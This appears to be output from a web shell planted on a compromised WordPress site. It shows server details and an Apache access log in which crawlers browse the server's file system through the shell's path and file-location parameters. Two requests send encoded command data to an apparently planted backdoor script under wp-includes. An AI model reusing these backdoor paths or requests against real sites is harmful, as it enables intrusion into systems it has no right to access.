HEX
Server: Apache/2.4.41 (Ubuntu)
System: Linux vps-320ddf0a 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64
User: lamphim (1008)
PHP: 7.4.3-4ubuntu2.29
Disabled: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
Upload Files
File: /var/www/lamphim/data/logs/lamphimquangcao.net-backend.access.log
74.7.227.215 - - [16/Nov/2025:00:00:04 +0000] "GET /q-~14GFqgayPmfpGsM0I4lLaIkdRKVULxSH7481/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/item.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:00:04 +0000] "GET /?path=//sys/bus/node/devices/node0/memory8/subsystem/devices/memory13/subsystem/devices/memory6/subsystem/devices/memory8/power HTTP/1.0" 200 3591 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
3.221.222.168 - - [16/Nov/2025:00:00:05 +0000] "GET /our-works/phim-viral-ila/?path=//sys/devices/virtual/input/mice/subsystem/input0/subsystem/input3 HTTP/1.0" 200 3678 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
136.243.153.17 - - [16/Nov/2025:00:00:05 +0000] "GET /our-works/tv-commercial/tvc-soffell-2/?path=%2F%2Fdev HTTP/1.0" 200 3808 "-" "serpstatbot/2.1 (advanced backlink tracking bot; https://serpstatbot.com/; abuse@serpstatbot.com)"
74.7.227.215 - - [16/Nov/2025:00:00:06 +0000] "GET /q-~2gcHMrzHEUJdpTJxEQH1Rqd8FsdleHY44829/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/item.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:00:06 +0000] "GET /?path=//sys/bus/node/devices/node0/memory8/subsystem/devices/memory13/subsystem/devices/memory6/subsystem/devices/memory5/power HTTP/1.0" 200 3592 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:00:07 +0000] "GET /q-~91gyUtOCwXemukNoT3JGedreLjMXHzDT17406/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/item.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
23.23.180.225 - - [16/Nov/2025:00:00:07 +0000] "GET /our-works/?path=//lib/python3/dist-packages/lazr/uri/__pycache__ HTTP/1.0" 200 3262 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.8 - - [16/Nov/2025:00:00:07 +0000] "GET /?path=//sys/bus/node/devices/node0/memory8/subsystem/devices/memory13/subsystem/devices/memory6/subsystem/devices/memory2/power HTTP/1.0" 200 3592 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
51.79.248.20 - - [16/Nov/2025:00:00:07 +0000] "GET / HTTP/1.0" 200 4804 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36"
74.7.227.215 - - [16/Nov/2025:00:00:08 +0000] "GET /q-~46ziBJOBVWdC8IQKvSPVfobqKkwXuCYp29637/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/item.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:00:08 +0000] "GET /?path=//sys/bus/node/devices/node0/memory8/subsystem/devices/memory13/subsystem/devices/memory6/subsystem/devices/memory4/power HTTP/1.0" 200 3592 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:00:09 +0000] "GET /q-~13fLQBaJgQ8oxtDJg3IeBLPCBVOMQToe9038/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/item.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:00:09 +0000] "GET /?path=//sys/bus/node/devices/node0/memory8/subsystem/devices/memory13/subsystem/devices/memory5/subsystem/devices/memory3 HTTP/1.0" 200 3634 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
52.3.102.51 - - [16/Nov/2025:00:00:10 +0000] "GET /our-works/tvc-jokky/?path=//sys/class/misc/loop-control/subsystem/snapshot/subsystem/vfio/subsystem/autofs HTTP/1.0" 200 3372 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.215 - - [16/Nov/2025:00:00:10 +0000] "GET /q-~274EdyPiHSWnBhJHOOcijcwoUMWtXeTGt10799/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/item.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:00:10 +0000] "GET /?path=//sys/bus/node/devices/node0/memory8/subsystem/devices/memory13/subsystem/devices/memory8/node0/subsystem/devices HTTP/1.0" 200 3227 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:00:11 +0000] "GET /q-~17BuvUnlJXFVW5HTDScislThbjZo2qhR2028/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/item.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:00:11 +0000] "GET /?path=//sys/bus/node/devices/node0/memory8/subsystem/devices/memory13/subsystem/devices/memory1/subsystem/devices/memory4 HTTP/1.0" 200 3633 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:00:12 +0000] "GET /q-~89ZIsaOnvUWHudZzpOEvg3rKACPsmHPV15432/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/item.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:00:13 +0000] "GET /?path=//sys/bus/node/devices/node0/memory8/subsystem/devices/memory13/subsystem/devices/memory6/subsystem/devices/memory9 HTTP/1.0" 200 3635 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:00:13 +0000] "GET /q-~9gHlussPdEMZuGI1eYMf1DqMJlBPqWg37600/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/item.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:00:14 +0000] "GET /?path=//sys/bus/node/devices/node0/memory9/subsystem/devices/memory1/node0/cpu0/driver/cpu0/hotplug HTTP/1.0" 200 3344 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
184.73.195.18 - - [16/Nov/2025:00:00:15 +0000] "GET /our-works/tvc-kimino/?path=//sys/class/input/input1/event1/device/subsystem/mice/subsystem/mice HTTP/1.0" 200 3355 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.215 - - [16/Nov/2025:00:00:15 +0000] "GET /q-~83pjHlXIv5tTJAAgstHz3VTWdoraIjQk4270/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/item.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:00:16 +0000] "GET /?path=//sys/bus/node/devices/node0/memory9/subsystem/devices/memory1/node0/cpu1/driver/cpu1/hotplug HTTP/1.0" 200 3344 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:00:16 +0000] "GET /q-~39Fy8AJk4mpWQmfBadTGJWtAjvsvxxDp6024/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/item.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
136.243.153.17 - - [16/Nov/2025:00:00:19 +0000] "GET /our-works/tv-commercial/tvc-soffell-2/?path=%2F%2Fboot HTTP/1.0" 200 3620 "-" "serpstatbot/2.1 (advanced backlink tracking bot; https://serpstatbot.com/; abuse@serpstatbot.com)"
74.7.227.8 - - [16/Nov/2025:00:00:19 +0000] "GET /?path=//sys/bus/node/devices/node0/memory9/subsystem/devices/memory1/node0/cpu0/driver/cpu1/topology HTTP/1.0" 200 3682 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:00:20 +0000] "GET /q-~220yKFwd4HmqrbYgEShcaWMHpByssUKxO9893/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/item.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
3.211.181.86 - - [16/Nov/2025:00:00:21 +0000] "GET /our-works/tvc-calci/?path=//sys/class/input/event0/subsystem/input1/event1/subsystem/input0/device HTTP/1.0" 200 3512 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.8 - - [16/Nov/2025:00:00:21 +0000] "GET /?path=//sys/bus/node/devices/node0/memory9/subsystem/devices/memory1/node0/cpu1/driver/cpu0/hotplug HTTP/1.0" 200 3348 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:00:22 +0000] "GET /q-~94BezULGvwmSsvWakzOckZosMZQYi3Xs33145/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/item.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
51.79.248.20 - - [15/Nov/2025:23:58:01 +0000] "GET /wp-includes/js/tinymce/themes/inlite/inlite/index.php?ARRAY=7o2230223n313736333235343638312p2231223n22687474703n5p2s5p2s7n733634377631336o6s2r636p65726o742r70726s5p2s3s6p633q7068705s636s64655s6n6326743q313736333235313038312q3064346136383338366639313436323839353062386363316434353734616465222p2232223n223563306234623137373836386638613030313830313630386261383031383135222p2233223n223731336661633265343537656430663232613737336362393365396137343664222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231322q33352q35332q36372q38302q38332q3231227q HTTP/1.0" 200 211 "-" "-"
52.205.141.124 - - [16/Nov/2025:00:00:24 +0000] "GET /our-works/tvc-jokky/?path=//sys/bus/virtio/devices/virtio1/driver/virtio1/host2/subsystem/drivers HTTP/1.0" 200 3237 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.8 - - [16/Nov/2025:00:00:24 +0000] "GET /?path=//sys/bus/node/devices/node0/memory8/subsystem/devices/memory13/subsystem/devices/memory5/subsystem/devices/memory3/power HTTP/1.0" 200 3594 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
154.54.249.196 - - [16/Nov/2025:00:00:25 +0000] "GET /our-works/tvc-calci/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/wp-includes/l10n.php&path=/var/www/lamphim/data/www/lamphimquangcao.net/wp-includes HTTP/1.0" 200 15748 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
74.7.227.215 - - [16/Nov/2025:00:00:25 +0000] "GET /q-~257XUdpuSYDAwEoIqkynlXGtjHOmishLH49318/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/item.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:00:26 +0000] "GET /?path=//sys/bus/node/devices/node0/memory9/subsystem/devices/memory1/node0/cpu0/driver/cpu1/hotplug HTTP/1.0" 200 3348 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:00:27 +0000] "GET /q-~294NcGhr4oIOnTYxHOgCotxNDb9uoyjVM983/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/item.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
52.204.81.148 - - [16/Nov/2025:00:00:27 +0000] "GET /our-works/tvc-jokky/?path=//sys/class/input/event0/device/event0/device/subsystem/input1/subsystem HTTP/1.0" 200 3592 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.8 - - [16/Nov/2025:00:00:27 +0000] "GET /?path=//sys/bus/node/devices/node0/memory8/subsystem/devices/memory13/subsystem/devices/memory8/subsystem/devices/memory5/power HTTP/1.0" 200 3592 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:00:28 +0000] "GET /q-~212QxpxUM8tdPRaJjFTbrelOiKujfpvQZ4047/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/item.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
136.243.153.17 - - [16/Nov/2025:00:00:28 +0000] "GET /our-works/tv-commercial/tvc-soffell-2/?path=%2F%2Fbin HTTP/1.0" 200 34893 "-" "serpstatbot/2.1 (advanced backlink tracking bot; https://serpstatbot.com/; abuse@serpstatbot.com)"
74.7.227.8 - - [16/Nov/2025:00:00:28 +0000] "GET /?path=//sys/bus/node/devices/node0/memory9/subsystem/devices/memory1/node0/cpu1/driver/cpu1/topology HTTP/1.0" 200 3676 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:00:29 +0000] "GET /q-~47LZOziZHVVayKSL3YAycbJqdIxTFhlq19382/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/item.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:00:29 +0000] "GET /?path=//sys/bus/node/devices/node0/memory9/subsystem/devices/memory1/node0/cpu1/driver/cpu0/topology HTTP/1.0" 200 3682 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:00:30 +0000] "GET /q-~45EHjjp5HFeOANZbzgWtJoTOZTDD3KLL2628/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/item.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:00:30 +0000] "GET /?path=//sys/bus/node/devices/node0/memory8/subsystem/devices/memory13/subsystem/devices/memory6/subsystem/devices/memory9/power HTTP/1.0" 200 3593 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
18.213.102.186 - - [16/Nov/2025:00:00:31 +0000] "GET /our-works/tvc-calci/?path=//sys/class/input/event1/device/subsystem/event0/device/device/driver HTTP/1.0" 200 3374 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.215 - - [16/Nov/2025:00:00:32 +0000] "GET /q-~232ZKwWBUbwHgkcZHPIBNOuMFC2lTpIOu9581/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/item.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:00:32 +0000] "GET /?path=//sys/bus/node/devices/node0/memory8/subsystem/devices/memory13/node0/cpu0/topology HTTP/1.0" 200 3686 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:00:34 +0000] "GET /q-~93eLJJqCyeIFopdBxUicwkS5WETWKTdr38744/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/item.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:00:34 +0000] "GET /?path=//sys/bus/node/devices/node0/memory8/subsystem/devices/memory13/node0/cpu1/topology HTTP/1.0" 200 3686 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:00:35 +0000] "GET /q-~9YEAhUmbsICqaCFDBThzEE54KPNsofX37706/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/item.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
3.215.59.93 - - [16/Nov/2025:00:00:36 +0000] "GET /our-works/tvc-lapatie-2/?path=//proc/self/root/sys/devices/platform/reg-dummy/subsystem/drivers/dwc2 HTTP/1.0" 200 3316 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.8 - - [16/Nov/2025:00:00:38 +0000] "GET /?path=//sys/bus/node/devices/node0/memory9/subsystem/devices/memory1/node0/cpu1/hotplug HTTP/1.0" 200 3323 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:00:40 +0000] "GET /q-~7dgWVJkjnJJeUvKfrv3UpjR7ezuIQDg29286/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/item.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
34.196.6.199 - - [16/Nov/2025:00:00:41 +0000] "GET /our-works/tvc-kimino/?path=//sys/class/misc/ecryptfs/subsystem/snapshot/subsystem/psaux/subsystem/mcelog HTTP/1.0" 200 3370 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
136.243.153.17 - - [16/Nov/2025:00:00:41 +0000] "GET /our-works/tv-commercial/tvc-soffell-2/?fileloc=%2Fvar%2Fwww%2Flamphim%2Fdata%2F.bashrc&path=%2Fvar%2Fwww%2Flamphim%2Fdata HTTP/1.0" 200 3001 "-" "serpstatbot/2.1 (advanced backlink tracking bot; https://serpstatbot.com/; abuse@serpstatbot.com)"
74.7.227.8 - - [16/Nov/2025:00:00:44 +0000] "GET /?path=//sys/bus/node/devices/node0/memory8/subsystem/devices/memory13/node0/cpu0/hotplug HTTP/1.0" 200 3325 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
51.79.248.20 - - [15/Nov/2025:23:58:23 +0000] "GET /wp-includes/js/tinymce/themes/inlite/inlite/index.php?ARRAY=7o2230223n313736333235343730332p2231223n22687474703n5p2s5p2s7n733634377631336o6s2r636p65726o742r70726s5p2s3s6p633q7068705s636s64655s6n6326743q313736333235313130332q6333363935333731613730663739343864636163346162656636363363313966222p2232223n223563306234623137373836386638613030313830313630386261383031383135222p2233223n223731336661633265343537656430663232613737336362393365396137343664222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231322q33352q35332q36372q38302q38332q3231227q HTTP/1.0" 200 211 "-" "-"
57.141.2.73 - - [16/Nov/2025:00:00:44 +0000] "GET /?products=613736 HTTP/1.0" 200 73703 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
74.7.227.215 - - [16/Nov/2025:00:00:45 +0000] "GET /q-~15HbWCGndRJQdVoqi5ibaSOrMVsLoQpJ31402/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/item.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
114.119.132.10 - - [16/Nov/2025:00:00:45 +0000] "GET /q-~271zc80KzJsxikLUv2rcUiLzr1cM2l1ET41386/ HTTP/1.0" 200 4801 "https://lamphimquangcao.net/sitemap971.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
44.213.36.21 - - [16/Nov/2025:00:00:46 +0000] "GET /our-works/tvc-calci/?path=//sys/class/input/event1/device/subsystem/event0/device/device/driver HTTP/1.0" 200 3374 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.8 - - [16/Nov/2025:00:00:46 +0000] "GET /?path=//sys/bus/node/devices/node0/memory9/subsystem/devices/memory1/node0/cpu1/firmware_node HTTP/1.0" 200 3635 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:00:46 +0000] "GET /q-~64An3YNGgyyoeWlVUQCMWKPHkqEZJ6yO6993/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/item.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
107.20.224.184 - - [16/Nov/2025:00:00:47 +0000] "GET /our-works/tvc-kimino/?path=//sys/dev/char/10:1/subsystem/kvm/subsystem/snapshot/subsystem/vfio HTTP/1.0" 200 3362 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.8 - - [16/Nov/2025:00:00:47 +0000] "GET /?path=//sys/bus/node/devices/node0/memory9/subsystem/devices/memory1/node0/cpu0/hotplug HTTP/1.0" 200 3323 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:00:47 +0000] "GET /q-~92OuGdCX8TsoJlDXhaxmdQDPMMDiBMmy48807/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/item.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:00:48 +0000] "GET /?path=//sys/bus/node/devices/node0/memory9/subsystem/devices/memory1/node0/cpu1/driver/cpu0/cache/index0 HTTP/1.0" 200 3680 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:00:48 +0000] "GET /q-~20bywEckGfNBKlRJj2wbiRrYBDus0jRo8769/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/item.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
217.113.194.32 - - [16/Nov/2025:00:00:49 +0000] "GET /our-works/tvc-calci/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/wp-includes/media-template.php&path=/var/www/lamphim/data/www/lamphimquangcao.net/wp-includes HTTP/1.0" 200 14826 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
74.7.227.8 - - [16/Nov/2025:00:00:50 +0000] "GET /?path=//sys/bus/node/devices/node0/memory9/subsystem/devices/memory1/node0/cpu0/driver/cpu1/cache/index0 HTTP/1.0" 200 3680 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:00:51 +0000] "GET /q-~5kj7FPNoBLLjlfKn7KXeKdXgzMOeHtL20586/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/item.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
